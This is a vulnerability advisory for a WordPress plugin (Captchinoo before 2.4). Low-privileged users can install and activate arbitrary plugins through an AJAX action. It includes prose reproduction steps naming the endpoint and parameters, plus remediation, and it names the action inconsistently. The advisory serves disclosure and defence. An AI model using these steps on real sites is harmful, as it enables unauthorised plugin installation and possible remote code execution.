WP-Buy WordPress Plugins Vulnerable to Arbitrary Plugin Installation and Activation via Low Privilege Users

A vulnerability exists in multiple WordPress plugins by WP-Buy, specifically in the Captchinoo, Google reCAPTCHA for Admin Login Page plugin, prior to version 2.4. Low privileged users can exploit this vulnerability using the AJAX action 'cp_plugins_do_button_job_later_callback' to install any plugin, including specific versions, from the WordPress repository. Additionally, the same AJAX action can be used to activate installed plugins, potentially leading to the exploitation of vulnerable plugins and more critical issues such as remote code execution.

Impact

Exploitation of this vulnerability allows for the installation and activation of arbitrary plugins, including vulnerable ones, which could lead to more severe vulnerabilities like remote code execution.

Reproduction

To reproduce this vulnerability, send a POST request to '/wp-admin/admin-ajax.php' with the 'action' parameter set to 'do_button_job_later', and the 'slug' parameter containing the desired plugin slug and version. This will trigger the installation of the specified plugin. To activate an installed plugin, use the same request but replace the 'slug' parameter with the 'plugin_file' parameter containing the plugin's file name.

Remediation

Users are advised to update to the latest version of the affected plugins. For the Captchinoo, Google reCAPTCHA for Admin Login Page plugin, the patched version is 2.4.